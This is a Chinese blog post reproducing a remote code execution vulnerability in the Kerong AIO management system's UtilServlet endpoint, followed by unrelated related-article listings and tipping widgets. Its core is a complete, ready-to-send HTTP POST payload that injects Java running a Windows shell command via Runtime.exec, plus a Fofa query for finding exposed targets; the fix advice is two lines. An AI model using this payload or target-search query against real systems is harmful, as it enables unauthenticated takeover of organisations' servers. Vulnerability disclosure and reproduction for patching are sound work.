科荣AIO系统 UtilServlet 代码执行漏洞

最新推荐文章于 2024-10-15 10:25:59 发布
最新推荐文章于 2024-10-15 10:25:59 发布
阅读量145 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142250768
版权

0x01 漏洞描述:

科荣AIO管理系统存在命令执行漏洞,攻击者可以通过构造恶意请求,进行远程代码执行。可导致服务器失陷,为确保系统安全,建议尽快修复漏洞。

0x02 搜索语句:

Fofa:body="changeAccount('8000')"

0x03 漏洞复现:

POST /UtilServlet HTTP/1.1
Host:your-ip
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:322

operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+dir").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field

0x04 修复建议:

如⾮必要,禁⽌公⽹访问该系统

请及时升级产品到最新版本

iSee857
关注
专栏目录
漏洞复现】科荣AIO UtilServlet 代码执行漏洞
alert['Hello World']
09-18 584
科荣AIO UtilServlet 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
科荣AIO UtilServlet存在任意命令执行漏洞 附POC软件
nnn2188185的博客
01-17 135
科荣AIO UtilServlet存在任意命令执行漏洞 附POC软件
科荣AIO UtilServlet存在任意命令执行漏洞
waxcj的博客
01-17 479
代码科荣AIO UtilServlet存在任意命令执行漏洞
漏洞复现-科荣AIO UtilServlet任意命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-17 701
漏洞复现-科荣AIO UtilServlet任意命令执行漏洞,附带自己写的poc脚本
科荣AIO UtilServlet 前台RCE漏洞
2301_77012231的博客
09-29 226
科荣AIO UtilServlet 接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该漏洞远程执行恶意代码,写入后门文件,可获取服务器权限。成功执行命令,拿到系统权限。
科荣AIO UtilServlet 前台RCE漏洞复现
0xSec
01-16 1110
科荣AIO UtilServlet接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该漏洞远程执行恶意代码,写入后门文件,可获取服务器权限。
科荣AIO管理系统 moffice接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 169
科荣AIO管理系统moffice接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科荣 AIO moffice SQL注入漏洞复现
0xSec
06-29 646
科荣AIO moffice 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科荣AIO管理系统V7版-用户手册
06-24
科荣AIO管理系统V7版-用户手册》是一份详尽的指南,旨在帮助用户理解和操作科荣AIO管理系统的最新版本——V7。这份手册不仅适合初学者,也适用于有一定经验的用户,提供了从基础到进阶的全方位学习资料。手册的...
《网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 466
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 962
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 566
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 2056
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 2320
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
2401_85026883的博客
10-14 1056
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
黑龙江APP等保测评:提升网络安全,守护用户数据
weixin_62641226的博客
10-11 585
等级保护制度是我国网络安全的重要法律法规,旨在通过对信息系统进行分级管理,确保其安全性。等保测评是对信息系统进行安全性评估的过程,主要包括对系统安全策略、技术措施和管理制度等方面的全面检查。通过等保测评,企业可以识别潜在的安全风险,制定相应的整改措施,从而提升整体安全防护能力。在信息安全日益重要的今天,黑龙江的APP开发者们应当重视等保测评,通过科学的评估和整改,提升网络安全水平,保护用户数据。只有这样,才能在激烈的市场竞争中立于不败之地。让我们共同努力,为用户创造一个安全、可靠的数字环境!
【网络安全】未加密的F5 BIG-IP Cookie存在严重漏洞将被攻击者利用
最新发布
par@ish的博客
10-15 461
需要注意的是,“优选”配置选项会生成加密的Cookie,但也允许系统接受未加密的Cookie。产品内的本地流量管理器(LTM)模块使用持久性Cookie,这些Cookie通过将客户端(如网页浏览器)的流量导向同一后端服务器来帮助维持会话的一致性,这对于负载均衡至关重要。“恶意网络行为者可以利用从未加密的持久性Cookie中收集的信息来推断或识别额外的网络资源,并可能利用网络上其他设备中存在的漏洞。从11.5.0版本开始,管理员被赋予了一个新的“必需”选项,以强制对所有Cookie进行加密。
科荣aio管理系统v7版-用户手册
12-02
科荣AIO管理系统V7版是一款全新升级的管理系统,旨在为用户提供更加便捷高效的操作体验。本用户手册将详细介绍系统的功能及操作方法,帮助用户快速上手使用。 系统功能方面,科荣AIO管理系统V7版提供了多种功能模块,包括人力资源管理、财务管理、销售管理、库存管理等。用户可以根据自身需求选择相应的模块进行操作。例如,人力资源管理模块提供了员工信息管理、考勤管理、工资管理等功能,用户可以通过该模块实现对人力资源的全面管理。 在操作方法方面,用户可以通过登录系统后,选择对应的模块进入相应页面。系统界面简洁清晰,用户可以通过菜单栏或快捷入口快速找到所需功能。在每个页面中,用户可以根据提示输入相应的信息,例如添加或修改员工信息、录入财务数据等。系统还提供了数据查询和报表生成等功能,用户可以方便地查看和分析数据。 此外,科荣AIO管理系统V7版还具有用户权限管理功能,管理员可以根据需要设置不同用户的权限,确保系统安全性和数据的保密性。 总之,科荣AIO管理系统V7版是一款功能强大、操作简便的管理系统,通过本用户手册的详细介绍,用户可以迅速掌握系统的使用方法,提高工作效率。如果用户在使用过程中遇到问题,可以参考本手册或联系系统供应商的客服人员寻求帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值